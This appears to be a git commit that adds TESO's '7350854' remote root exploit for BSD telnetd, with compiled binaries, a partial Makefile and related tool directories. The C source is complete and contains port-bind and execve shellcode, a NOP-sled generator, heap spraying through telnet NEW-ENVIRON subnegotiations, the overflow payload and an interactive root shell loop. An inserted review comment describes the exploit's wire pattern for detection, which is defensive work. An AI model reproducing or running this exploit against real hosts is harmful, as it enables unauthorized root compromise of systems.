authorRoot THC2026-02-24 12:42:47 +0000
committerRoot THC2026-02-24 12:42:47 +0000
commitc9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
treeaefc355416b561111819de159ccbd86c3004cf88 /other/burneye2/tmp
parent073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
initial
Diffstat (limited to 'other/burneye2/tmp')
-rw-r--r--other/burneye2/tmp/854/7350854-dietlibcbin0 -> 32313 bytes
-rw-r--r--other/burneye2/tmp/854/7350854-final-dietlibc.obin0 -> 39685 bytes
-rw-r--r--other/burneye2/tmp/854/7350854-final-glibc.obin0 -> 661666 bytes
-rw-r--r--other/burneye2/tmp/854/7350854-glibcbin0 -> 559779 bytes
-rw-r--r--other/burneye2/tmp/854/7350854.c877
-rw-r--r--other/burneye2/tmp/854/7350854.obin0 -> 11912 bytes
-rw-r--r--other/burneye2/tmp/854/Makefile28
-rw-r--r--other/burneye2/tmp/854/obj-dietstart/start.obin0 -> 628 bytes
-rw-r--r--other/burneye2/tmp/ed-final-dietlibc.obin0 -> 322411 bytes
-rw-r--r--other/burneye2/tmp/exectest/simple.c35
-rw-r--r--other/burneye2/tmp/exectest/simple.obin0 -> 1012 bytes
-rw-r--r--other/burneye2/tmp/funcptr/fptr.c24
-rw-r--r--other/burneye2/tmp/funcptr/fptr.obin0 -> 852 bytes
-rw-r--r--other/burneye2/tmp/iob/Makefile32
-rw-r--r--other/burneye2/tmp/iob/iobbin0 -> 47244 bytes
-rw-r--r--other/burneye2/tmp/iob/iob-dietlibcbin0 -> 20153 bytes
-rw-r--r--other/burneye2/tmp/iob/iob-final-dietlibc.obin0 -> 24745 bytes
-rw-r--r--other/burneye2/tmp/iob/iob-final-glibc.obin0 -> 519927 bytes
-rw-r--r--other/burneye2/tmp/iob/iob-glibcbin0 -> 441532 bytes
-rw-r--r--other/burneye2/tmp/iob/iob.c303
-rw-r--r--other/burneye2/tmp/iob/iob.obin0 -> 4400 bytes
-rw-r--r--other/burneye2/tmp/iob/pty.c315
-rw-r--r--other/burneye2/tmp/iob/pty.h95
-rw-r--r--other/burneye2/tmp/iob/pty.obin0 -> 2888 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/Makefile37
-rw-r--r--other/burneye2/tmp/ldistfp/common.c373
-rw-r--r--other/burneye2/tmp/ldistfp/common.h33
-rw-r--r--other/burneye2/tmp/ldistfp/common.obin0 -> 2924 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/fp.txt122
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp-dietlibcbin0 -> 40789 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp-final-dietlibc.obin0 -> 50749 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp-final-glibc.obin0 -> 667584 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp-glibcbin0 -> 564697 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp.c368
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp.obin0 -> 7304 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/network.c712
-rw-r--r--other/burneye2/tmp/ldistfp/network.h287
-rw-r--r--other/burneye2/tmp/ldistfp/network.obin0 -> 7304 bytes
-rw-r--r--other/burneye2/tmp/linktest/Makefile21
-rw-r--r--other/burneye2/tmp/linktest/dummy.c6
-rw-r--r--other/burneye2/tmp/linktest/hello-final.obin0 -> 9461 bytes
-rw-r--r--other/burneye2/tmp/linktest/hello.c13
-rw-r--r--other/burneye2/tmp/linktest/hello.obin0 -> 896 bytes
-rw-r--r--other/burneye2/tmp/linktest/obj-dietstart/start.obin0 -> 628 bytes
-rw-r--r--other/burneye2/tmp/logout/7350logout-dietlibcbin0 -> 37310 bytes
-rw-r--r--other/burneye2/tmp/logout/7350logout-final-dietlibc.obin0 -> 47146 bytes
-rw-r--r--other/burneye2/tmp/logout/7350logout-final-glibc.obin0 -> 548025 bytes
-rw-r--r--other/burneye2/tmp/logout/7350logout-glibcbin0 -> 464698 bytes
-rw-r--r--other/burneye2/tmp/logout/7350logout.c1189
-rw-r--r--other/burneye2/tmp/logout/7350logout.obin0 -> 14860 bytes
-rw-r--r--other/burneye2/tmp/logout/Makefile30
-rw-r--r--other/burneye2/tmp/ssh-final-dietlibc.obin0 -> 2373391 bytes
-rw-r--r--other/burneye2/tmp/switchtab/Makefile19
-rw-r--r--other/burneye2/tmp/switchtab/switch.c39
-rw-r--r--other/burneye2/tmp/switchtab/switch.obin0 -> 932 bytes
-rw-r--r--other/burneye2/tmp/switchtab/switch_output.c41
-rw-r--r--other/burneye2/tmp/switchtab/switch_output.obin0 -> 1080 bytes
57 files changed, 4999 insertions, 0 deletions
diff --git a/other/burneye2/tmp/854/7350854-dietlibc b/other/burneye2/tmp/854/7350854-dietlibc
new file mode 100644
index 0000000..a9a50d6
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854-dietlibc
Binary files differ
diff --git a/other/burneye2/tmp/854/7350854-final-dietlibc.o b/other/burneye2/tmp/854/7350854-final-dietlibc.o
new file mode 100644
index 0000000..a9f31b5
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854-final-dietlibc.o
Binary files differ
diff --git a/other/burneye2/tmp/854/7350854-final-glibc.o b/other/burneye2/tmp/854/7350854-final-glibc.o
new file mode 100644
index 0000000..7efee82
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854-final-glibc.o
Binary files differ
diff --git a/other/burneye2/tmp/854/7350854-glibc b/other/burneye2/tmp/854/7350854-glibc
new file mode 100644
index 0000000..46a1c92
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854-glibc
Binary files differ
diff --git a/other/burneye2/tmp/854/7350854.c b/other/burneye2/tmp/854/7350854.c
new file mode 100644
index 0000000..95dd740
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854.c
@@ -0,0 +1,877 @@
1/* 7350854 - x86/bsd telnetd remote root exploit
2 *
3 * TESO CONFIDENTIAL - SOURCE MATERIALS
4 *
5 * This is unpublished proprietary source code of TESO Security.
6 *
7 * The contents of these coded instructions, statements and computer
8 * programs may not be disclosed to third parties, copied or duplicated in
9 * any form, in whole or in part, without the prior written permission of
10 * TESO Security. This includes especially the Bugtraq mailing list, the
11 * www.hack.co.za website and any public exploit archive.
12 *
13 * (C) COPYRIGHT TESO Security, 2001
14 * All Rights Reserved
15 *
16 *****************************************************************************
17 * bug found by scut 2001/06/09
18 * further research by smiler, zip, lorian and me.
19 * thanks to zip's cool friend for giving me a testbed to play on
20 *
21 * tested against: BSDI BSD/OS 4.1
22 * NetBSD 1.5
23 * FreeBSD 3.1
24 * FreeBSD 4.0-REL
25 * FreeBSD 4.2-REL
26 * FreeBSD 4.3-BETA
27 * FreeBSD 4.3-STABLE
28 * FreeBSD 4.3-RELEASE
29 *
30 */
31
32#define VERSION "0.0.7"
33
34#include <sys/types.h>
35#include <sys/time.h>
36#include <sys/socket.h>
37#include <netinet/in.h>
38#include <arpa/inet.h>
39#include <arpa/telnet.h>
40#include <netdb.h>
41#include <errno.h>
42#include <fcntl.h>
43#include <unistd.h>
44#include <stdio.h>
45#include <stdlib.h>
46#include <string.h>
47#include <time.h>
48
49
50/* global variables, uhhohh!
51 */
52int mode = 16;
53int num = 245;
54int pop = 31500; /* puts code at 0x08fdff0a */
55int bs = 1; /* buffer start */
56
57int num34 = 244;
58int pop34 = 71833; /* puts code at 0x0a0d08fe */
59int bs34 = 0;
60
61int walk; /* populator walker */
62int force = 0; /* force exploitation */
63int checkonly = 0; /* check telnetd only */
64
65
66void usage (char *progname);
67int xp_check (int fd);
68void xp_pop (int fd);
69void xp_shrinkwin (int fd);
70void xp_setenv (int fd, unsigned char *var, unsigned char *val);
71void xp (int fd);
72void shell (int sock);
73void hexdump (char *desc, unsigned char *data, unsigned int amount);
74
75/* imported from shellkit */
76unsigned long int random_get (unsigned long int low, unsigned long int high);
77void random_init (void);
78int bad (unsigned char u);
79int badstr (unsigned char *code, int code_len, unsigned char *bad,
80 int bad_len);
81unsigned long int x86_nop_rwreg (void);
82unsigned long int x86_nop_xfer (char *xferstr);
83unsigned int x86_nop (unsigned char *dest, unsigned int dest_len,
84 unsigned char *bad, int bad_len);
85
86#define BSET(dest, len, val, bw) { \
87 dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \
88 dest |= val << (8 - bw - len); /* set value bits */ \
89 bw += len; \
90}
91
92/* imported from network.c */
93#define NET_CONNTIMEOUT 60
94int net_conntimeout = NET_CONNTIMEOUT;
95
96unsigned long int net_resolve (char *host);
97int net_connect (struct sockaddr_in *cs, char *server,
98 unsigned short int port, int sec);
99
100
101/* x86/bsd PIC portshell shellcode
102 * by lorian/teso
103 * port 0x4444 (might want to change it here)
104 */
105unsigned char x86_bsd_portshell[] =
106 "\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53"
107 "\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5"
108 /* ^^ ^^ port */
109 "\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a"
110 "\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a"
111 "\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73"
112 "\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd"
113 "\x80";
114
115/* x86/bsd PIC execve shellcode
116 * by lorian/teso
117 */
118unsigned char x86_bsd_execvesh[] =
119 "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68"
120 "\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80";
121
122/* x86/bsd(i)+solaris execve shellcode
123 * by lorian/teso
124 */
125unsigned char x86_bsd_compaexec[] =
126 "\xbf\xee\xee\xee\x08\xb8\xff\xf8\xff\x3c\xf7\xd0"
127 "\xfd\xab\x31\xc0\x99\xb0\x9a\xab\xfc\xab\xb0\x3b"
128 "\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
129 "\xe3\x52\x53\x89\xe1\x52\x51\x53\xff\xd7";
130
131
132unsigned char * shellcode = x86_bsd_compaexec;
133
134
135#define COL 55
136
137
138void
139usage (char *progname)
140{
141 fprintf (stderr, "usage: %s [-n <num>] [-c] [-f] <ip>\n\n", progname);
142 fprintf (stderr, "-n num\tnumber of populators, for testing purposes\n"
143 "-c\tcheck exploitability only, do not exploit\n"
144 "-f\tforce mode, override check results\n\n");
145 fprintf (stderr, "WARNING: this is no easy exploit, we have to get things tightly aligned and\n"
146 "send 16/34mb of traffic to the remote telnet daemon. it might not be able to\n"
147 "take that, or it will take very long for it (> 1h). beware.\n\n");
148
149 fprintf (stderr, "tested:\tFreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE \n"
150 "\tNetBSD 1.5\n"
151 "\tBSDI BSD/OS 4.1\n\n");
152
153 exit (EXIT_FAILURE);
154}
155
156int
157main (int argc, char *argv[])
158{
159 char c;
160 char * progname;
161 char * dest;
162 int i, j, fd,
163 dots = 0;
164 int popc;
165 struct timeval start,
166 cur;
167 unsigned long long int g_pct, /* gaussian percentage */
168 g_all; /* gaussian overall */
169
170
171 fprintf (stderr, "7350854 - x86/bsd telnetd remote root\n"
172 "by zip, lorian, smiler and scut.\n\n");
173
174 progname = argv[0];
175 if (argc < 2)
176 usage (progname);
177
178
179 while ((c = getopt (argc, argv, "n:cf")) != EOF) {
180 switch (c) {
181 case 'n':
182 num = atoi (optarg);
183 break;
184 case 'c':
185 checkonly = 1;
186 break;
187 case 'f':
188 force = 1;
189 break;
190 default:
191 usage (progname);
192 break;
193 }
194 }
195
196 dest = argv[argc - 1];
197 if (dest[0] == '-')
198 usage (progname);
199
200 fd = net_connect (NULL, dest, 23, 20);
201 if (fd <= 0) {
202 fprintf (stderr, "failed to connect\n");
203 exit (EXIT_FAILURE);
204 }
205
206 random_init ();
207
208 if (xp_check (fd) == 0 && force == 0) {
209 printf ("aborting\n");
210#ifndef DEBUG
211 exit (EXIT_FAILURE);
212#endif
213 }
214 close (fd);
215
216 if (checkonly)
217 exit (EXIT_SUCCESS);
218
219 fd = net_connect (NULL, dest, 23, 20);
220 if (fd <= 0) {
221 fprintf (stderr, "failed to connect the second time\n");
222 exit (EXIT_FAILURE);
223 }
224
225 printf ("\n#############################################################################\n\n");
226 printf ("ok baby, times are rough, we send %dmb traffic to the remote\n"
227 "telnet daemon process, it will spill badly. but then, there is no\n"
228 "other way, sorry...\n\n", mode);
229
230#ifdef DEBUG
231 getchar ();
232#endif
233 printf ("## setting populators to populate heap address space\n");
234
235 g_all = ((unsigned long long int)(pop / 2)) *
236 ((unsigned long long int)(pop + 1));
237 g_pct = 0;
238
239 printf ("## number of setenvs (dots / network): %d\n", pop);
240 printf ("## number of walks (percentage / cpu): %Lu\n", g_all);
241 printf ("##\n");
242 printf ("## the percentage is more realistic than the dots ;)\n");
243 printf ("\n");
244 printf ("percent |");
245
246 popc = pop / COL;
247 for (i = pop / popc ; i >= 0 ; --i)
248 printf ("-");
249 printf ("| ETA |\n");
250
251 gettimeofday (&start, NULL);
252
253 for (walk = 0 ; walk < pop ; ++walk) {
254 xp_pop (fd);
255
256 g_pct += walk;
257
258 if (walk % popc == 0)
259 dots += 1;
260
261 if (walk % 200 == 0) {
262 int pct;
263 float pct_f;
264 unsigned long int diff;
265
266 pct = (int) ((g_pct * 100) / g_all);
267 pct_f = g_pct * 100;
268 pct_f /= (float) g_all;
269
270 /* calculate difference not caring about accuracy */
271 gettimeofday (&cur, NULL);
272 diff = cur.tv_sec - start.tv_sec;
273
274 printf ((pct == 100) ? "\r%3.2f%% |" : ((pct / 10) ?
275 "\r %2.2f%% |" : "\r %1.2f%% |"), pct_f);
276 for (j = 0 ; j < dots ; ++j)
277 printf (".");
278 for ( ; j <= COL ; ++j)
279 printf (" ");
280
281 if (pct != 0) {
282 diff = (int) ((((float)(100 - pct_f)) /
283 (float) pct_f) * diff);
284 printf ("| %02lu:%02lu:%02lu |",
285 diff / 3600, (diff % 3600) / 60,
286 diff % 60);
287 } else {
288 printf ("| --:--:-- |");
289 }
290
291 fflush (stdout);
292 }
293 }
294 printf ("\n\n");
295
296 printf ("## sleeping for 10 seconds to let the process recover\n");
297 sleep (10);
298
299#ifdef DEBUG
300 getchar ();
301#endif
302 /* return into 0x08feff0a */
303 xp (fd);
304 sleep (1);
305
306 printf ("## ok, you should now have a root shell\n");
307 printf ("## as always, after hard times, there is a reward...\n");
308 printf ("\n\ncommand: ");
309 fflush (stdout);
310
311 shell (fd);
312
313 exit (EXIT_SUCCESS);
314}
315
316
317void
318xp (int fd)
319{
320 int n;
321 unsigned char buf[2048];
322
323
324 /* basic overflow */
325 for (n = bs ; n < sizeof (buf) ; ++n)
326 buf[n] = (n - bs) % 2 ? '\xf6' : '\xff';
327
328 /* some nifty alignment */
329 buf[0] = '\xff'; /* IAC */
330 buf[1] = '\xf5'; /* AO */
331
332 if (mode == 16) {
333 buf[2] = '\xff'; /* IAC */
334 buf[3] = '\xfb'; /* WILL */
335 buf[4] = '\x26'; /* ENCRYPTION */
336 }
337
338 /* force 0x08feff0a as return */
339 buf[num++] = '\xff';
340 buf[num++] = '\xfb';
341 buf[num++] = '\x08';
342
343 /* and the output_encrypt overwrite action, yay! */
344 buf[num++] = '\xff';
345 buf[num++] = '\xf6';
346
347 /* XXX: should not fail here, though we should better loop and check */
348 n = send (fd, buf, num, 0);
349 if (n != num) {
350 perror ("xp:send");
351 }
352}
353
354
355#ifdef INSANE_MIND
356
357void
358xp_shrinkwin (int fd)
359{
360 int n;
361 int iobc;
362 int p = 0;
363 unsigned char buf[2048];
364 char c;
365 int val;
366 int len;
367
368 for (n = 0 ; n < sizeof (buf) ; ++n)
369 buf[n] = n % 2 ? '\xf6' : '\xff';
370
371 len = sizeof (val);
372 getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len);
373 printf ("SO_SNDLOWAT = %d\n", val);
374 val = 1;
375 printf ("setsockopt: %s\n",
376 setsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, sizeof(val)) ?
377 "FAILED" : "SUCCESS");
378 val = 1234;
379 getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len);
380 printf ("SO_SNDLOWAT = %d\n", val);
381
382 getchar();
383 while (1) {
384 if (p > 105)
385 c = getchar();
386 if (c == 'r') {
387 getchar();
388 read (fd, &buf[1024], 384);
389 } else if (c == 'o') {
390 getchar();
391 send (fd, "7", 1, MSG_OOB);
392 } else if (c != 'r') {
393 usleep(100000);
394 n = send (fd, buf, 112, 0);
395 ioctl (fd, FIONREAD, &iobc);
396 len = sizeof (val);
397 getsockopt (fd, SOL_SOCKET, SO_RCVBUF, &val, &len);
398 printf ("%02d. send: %d local: %d/%d (%d left)\n",
399 ++p, n, iobc, val, val - iobc);
400 }
401 }
402}
403#endif
404
405
406/* xp_pop - populator function
407 *
408 * causes remote telnet daemon to setenv() variables with our content, populating
409 * the heap with shellcode. this will get us more nopspace and place our shellcode
410 * where the nice addresses are, that we can create by writing telnet option
411 * strings.
412 *
413 * XXX: there seems to be a maximum size for the environment value you can set,
414 * which is 510. we use 496 bytes for nopspace and shellcode therefore.
415 * should work, rather similar to tsig tcp/malloc exploitation. -sc
416 */
417
418void
419xp_pop (int fd)
420{
421 unsigned char var[16];
422 unsigned char storebuf[496];
423 sprintf (var, "%06x", walk);
424#ifdef DEBUG
425 memset (storebuf, '\xcc', sizeof (storebuf));
426#else
427/* memset (storebuf, '\x90', sizeof (storebuf)); */
428 x86_nop (storebuf, sizeof (storebuf), "\x00\x01\x02\x03\xff", 5);
429 memcpy (storebuf + sizeof (storebuf) - strlen (shellcode) - 1,
430 shellcode, strlen (shellcode));
431#endif
432 storebuf[sizeof (storebuf) - 1] = '\0';
433
434 xp_setenv (fd, var, storebuf);
435}
436
437
438void
439xp_setenv (int fd, unsigned char *var, unsigned char *val)
440{
441 int n = 0;
442 unsigned char buf[2048];
443
444 buf[n++] = IAC;
445 buf[n++] = SB;
446 buf[n++] = TELOPT_NEW_ENVIRON;
447 buf[n++] = TELQUAL_IS;
448 buf[n++] = ENV_USERVAR;
449
450 /* should not contain < 0x04 */
451 while (*var) {
452 if (*var == IAC)
453 buf[n++] = *var;
454 buf[n++] = *var++;
455 }
456 buf[n++] = NEW_ENV_VALUE;
457 while (*val) {
458 if (*val == IAC)
459 buf[n++] = *val;
460 buf[n++] = *val++;
461 }
462 buf[n++] = IAC;
463 buf[n++] = SE;
464
465 if (send (fd, buf, n, 0) != n) {
466 perror ("xp_setenv:send");
467 exit (EXIT_FAILURE);
468 }
469}
470
471
472int
473xp_check (int fd)
474{
475 int n;
476 unsigned int expect_len = 15;
477 unsigned char expected[] =
478 "\x0d\x0a\x5b\x59\x65\x73\x5d\x0d\x0a\xff\xfe\x08\xff\xfd\x26";
479 /* \r \n [ Y e s ] \r \n IAC DONT 08 IAC DO 26*/
480 unsigned int additional_len = 8;
481 unsigned char additional[] =
482 "\xff\xfa\x26\x01\x01\x02\xff\xf0";
483 /*IAC SB ENC ........... IAC SE */
484
485 unsigned char buf[128];
486
487 read (fd, buf, sizeof (buf));
488
489 n = 0;
490 buf[n++] = IAC; /* 0xff */
491 buf[n++] = AYT; /* 0xf6 */
492
493 buf[n++] = IAC; /* 0xff */
494 buf[n++] = WILL; /* 0xfb */
495 buf[n++] = TELOPT_NAOL; /* 0x08 */
496
497 buf[n++] = IAC; /* 0xff */
498 buf[n++] = WILL; /* 0xfb */
499 buf[n++] = TELOPT_ENCRYPT; /* 0x26 */
500
501#ifdef DEBUG
502 hexdump ("check send buffer", buf, n);
503#endif
504 if (send (fd, buf, n, 0) != n) {
505 perror ("xp_check:send");
506 exit (EXIT_FAILURE);
507 }
508
509 n = read (fd, buf, sizeof (buf));
510#ifdef DEBUG
511 hexdump ("check recv buffer", buf, n);
512#endif
513
514 if (memcmp (buf, expected, expect_len) == 0) {
515 if (memcmp (buf+expect_len, additional, additional_len) == 0) {
516 mode = 16;
517 } else {
518 mode = 34;
519 bs = bs34;
520 }
521 printf ("check: PASSED, using %dmb mode\n", mode);
522
523 return (1);
524 }
525
526 printf ("check: FAILED\n");
527
528 return (0);
529}
530
531
532void
533shell (int sock)
534{
535 int l;
536 char buf[512];
537 fd_set rfds;
538
539
540 while (1) {
541 FD_SET (0, &rfds);
542 FD_SET (sock, &rfds);
543
544 select (sock + 1, &rfds, NULL, NULL, NULL);
545 if (FD_ISSET (0, &rfds)) {
546 l = read (0, buf, sizeof (buf));
547 if (l <= 0) {
548 perror ("read user");
549 exit (EXIT_FAILURE);
550 }
551 write (sock, buf, l);
552 }
553
554 if (FD_ISSET (sock, &rfds)) {
555 l = read (sock, buf, sizeof (buf));
556 if (l <= 0) {
557 perror ("read remote");
558 exit (EXIT_FAILURE);
559 }
560 write (1, buf, l);
561 }
562 }
563}
564
565
566/* ripped from zodiac */
567void
568hexdump (char *desc, unsigned char *data, unsigned int amount)
569{
570 unsigned int dp, p; /* data pointer */
571 const char trans[] =
572 "................................ !\"#$%&'()*+,-./0123456789"
573 ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
574 "nopqrstuvwxyz{|}~...................................."
575 "....................................................."
576 "........................................";
577
578
579 printf ("/* %s, %u bytes */\n", desc, amount);
580
581 for (dp = 1; dp <= amount; dp++) {
582 fprintf (stderr, "%02x ", data[dp-1]);
583 if ((dp % 8) == 0)
584 fprintf (stderr, " ");
585 if ((dp % 16) == 0) {
586 fprintf (stderr, "| ");
587 p = dp;
588 for (dp -= 16; dp < p; dp++)
589 fprintf (stderr, "%c", trans[data[dp]]);
590 fflush (stderr);
591 fprintf (stderr, "\n");
592 }
593 fflush (stderr);
594 }
595 if ((amount % 16) != 0) {
596 p = dp = 16 - (amount % 16);
597 for (dp = p; dp > 0; dp--) {
598 fprintf (stderr, " ");
599 if (((dp % 8) == 0) && (p != 8))
600 fprintf (stderr, " ");
601 fflush (stderr);
602 }
603 fprintf (stderr, " | ");
604 for (dp = (amount - (16 - p)); dp < amount; dp++)
605 fprintf (stderr, "%c", trans[data[dp]]);
606 fflush (stderr);
607 }
608 fprintf (stderr, "\n");
609
610 return;
611}
612
613
614
615unsigned long int
616net_resolve (char *host)
617{
618 long i;
619 struct hostent *he;
620
621 i = inet_addr(host);
622 if (i == -1) {
623 he = gethostbyname(host);
624 if (he == NULL) {
625 return (0);
626 } else {
627 return (*(unsigned long *) he->h_addr);
628 }
629 }
630 return (i);
631}
632
633
634int
635net_connect (struct sockaddr_in *cs, char *server,
636 unsigned short int port, int sec)
637{
638 int n,
639 len,
640 error,
641 flags;
642 int fd;
643 struct timeval tv;
644 fd_set rset, wset;
645 struct sockaddr_in csa;
646
647 if (cs == NULL)
648 cs = &csa;
649
650 /* first allocate a socket */
651 cs->sin_family = AF_INET;
652 cs->sin_port = htons (port);
653 fd = socket (cs->sin_family, SOCK_STREAM, 0);
654 if (fd == -1)
655 return (-1);
656
657 if (!(cs->sin_addr.s_addr = net_resolve (server))) {
658 close (fd);
659 return (-1);
660 }
661
662 flags = fcntl (fd, F_GETFL, 0);
663 if (flags == -1) {
664 close (fd);
665 return (-1);
666 }
667 n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
668 if (n == -1) {
669 close (fd);
670 return (-1);
671 }
672
673 error = 0;
674
675 n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
676 if (n < 0) {
677 if (errno != EINPROGRESS) {
678 close (fd);
679 return (-1);
680 }
681 }
682 if (n == 0)
683 goto done;
684
685 FD_ZERO(&rset);
686 FD_ZERO(&wset);
687 FD_SET(fd, &rset);
688 FD_SET(fd, &wset);
689 tv.tv_sec = sec;
690 tv.tv_usec = 0;
691
692 n = select(fd + 1, &rset, &wset, NULL, &tv);
693 if (n == 0) {
694 close(fd);
695 errno = ETIMEDOUT;
696 return (-1);
697 }
698 if (n == -1)
699 return (-1);
700
701 if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
702 if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
703 len = sizeof(error);
704 if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
705 errno = ETIMEDOUT;
706 return (-1);
707 }
708 if (error == 0) {
709 goto done;
710 } else {
711 errno = error;
712 return (-1);
713 }
714 }
715 } else
716 return (-1);
717
718done:
719 n = fcntl(fd, F_SETFL, flags);
720 if (n == -1)
721 return (-1);
722 return (fd);
723}
724
725
726/* imported from shellkit */
727
728unsigned long int
729random_get (unsigned long int low, unsigned long int high)
730{
731 unsigned long int val;
732
733 if (low > high) {
734 low ^= high;
735 high ^= low;
736 low ^= high;
737 }
738
739 val = (unsigned long int) random ();
740 val %= (high - low);
741 val += low;
742
743 return (val);
744}
745
746
747void
748random_init (void)
749{
750 srandom (time (NULL));
751}
752
753
754int
755bad (unsigned char u)
756{
757 if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
758 return (1);
759
760 return (0);
761}
762
763int
764badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len)
765{
766 int n;
767
768 for (code_len -= 1 ; code_len >= 0 ; --code_len) {
769 for (n = 0 ; n < bad_len ; ++n)
770 if (code[code_len] == bad[n])
771 return (1);
772 }
773
774 return (0);
775}
776
777unsigned long int
778x86_nop_rwreg (void)
779{
780 unsigned long int reg;
781
782 do {
783 reg = random_get (0, 7);
784 } while (reg == 4); /* 4 = $esp */
785
786 return (reg);
787}
788
789
790
791unsigned long int
792x86_nop_xfer (char *xferstr)
793{
794 int bw = 0; /* bitfield walker */
795 unsigned char tgt; /* resulting instruction */
796
797 /* in a valid xferstr we trust */
798 for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) {
799 switch (xferstr[0]) {
800 case ('0'):
801 BSET (tgt, 1, 0, bw);
802 break;
803 case ('1'):
804 BSET (tgt, 1, 1, bw);
805 break;
806 case ('r'):
807 BSET (tgt, 3, x86_nop_rwreg (), bw);
808 break;
809 case ('.'):
810 break; /* ignore */
811 default:
812 fprintf (stderr, "on steroids, huh?\n");
813 exit (EXIT_FAILURE);
814 break;
815 }
816 }
817
818 if (bw != 8) {
819 fprintf (stderr, "invalid bitwalker: bw = %d\n", bw);
820 exit (EXIT_FAILURE);
821 }
822
823 return (tgt);
824}
825
826
827unsigned int
828x86_nop (unsigned char *dest, unsigned int dest_len,
829 unsigned char *bad, int bad_len)
830{
831 int walk;
832 int bcount; /* bad counter */
833 char * xs;
834 char * xferstr[] = {
835 "0011.0111", /* aaa */
836 "0011.1111", /* aas */
837 "1001.1000", /* cbw */
838 "1001.1001", /* cdq */
839 "1111.1000", /* clc */
840 "1111.1100", /* cld */
841 "1111.0101", /* cmc */
842 "0010.0111", /* daa */
843 "0010.1111", /* das */
844 "0100.1r", /* dec <reg> */
845 "0100.0r", /* inc <reg> */
846 "1001.1111", /* lahf */
847 "1001.0000", /* nop */
848 "1111.1001", /* stc */
849 "1111.1101", /* std */
850 "1001.0r", /* xchg al, <reg> */
851 NULL,
852 };
853 unsigned char tgt;
854
855
856 for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) {
857 /* avoid endless loops on excessive badlisting */
858 for (bcount = 0 ; bcount < 16384 ; ++bcount) {
859 xs = xferstr[random_get (0, 15)];
860 tgt = x86_nop_xfer (xs);
861
862 dest[walk] = tgt;
863 if (badstr (&dest[walk], 1, bad, bad_len) == 0)
864 break;
865 }
866
867 /* should not happen */
868 if (bcount >= 16384) {
869 fprintf (stderr, "too much blacklisting, giving up...\n");
870 exit (EXIT_FAILURE);
871 }
872 }
873
874 return (walk);
875}
876
877
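Review bot: xp_check and xp_setenv fix this client's traffic byte for byte, but the file never states the resulting wire pattern, which is what someone reading a capture or writing a telnet-protocol rule needs. From the visible code the first bytes the client sends are IAC AYT, IAC WILL NAOL, IAC WILL ENCRYPT, and the second connection then carries `pop` (31500 by default) NEW-ENVIRON subnegotiations whose USERVAR names are the six hex digits of a rising counter and whose values run to 495 bytes. I would record that above xp_setenv, e.g. `/* wire: IAC SB NEW-ENVIRON IS USERVAR <%06x counter> VALUE <up to 495 bytes> IAC SE, repeated pop times on one connection */`. A telnetd that caps the number or total size of environment subnegotiations per session would presumably refuse this pattern regardless of the overflow itself; that is inferred from the code, not something the file documents.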
diff --git a/other/burneye2/tmp/854/7350854.o b/other/burneye2/tmp/854/7350854.o
new file mode 100644
index 0000000..53b6fd8
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854.o
Binary files differ
diff --git a/other/burneye2/tmp/854/Makefile b/other/burneye2/tmp/854/Makefile
new file mode 100644
index 0000000..c2688cb
--- /dev/null
+++ b/other/burneye2/tmp/854/Makefile
@@ -0,0 +1,28 @@
1
2CC=gcc
3CFLAGS=-Os -nostdlib
4
5# 1. order of start.o important, -L/-l does not matter
6LIBS_DIET=/usr/lib/diet/lib-i386/start.o \
7 -L/usr/lib/diet/lib-i386 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc
8# gcc --help -v 2>&1 |grep crt
9LIBS_GLIBC=/usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i386-linux/2.95.4/crtbegin.o \
10 -lpthread -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc \
11 /usr/lib/gcc-lib/i386-linux/2.95.4/crtend.o /usr/lib/crtn.o
12
13all: 7350854
14
15clean:
16 rm -f *.o 7350854-glibc 7350854-dietlibc
17
187350854: 7350854-final-dietlibc.o 7350854-final-glibc.o
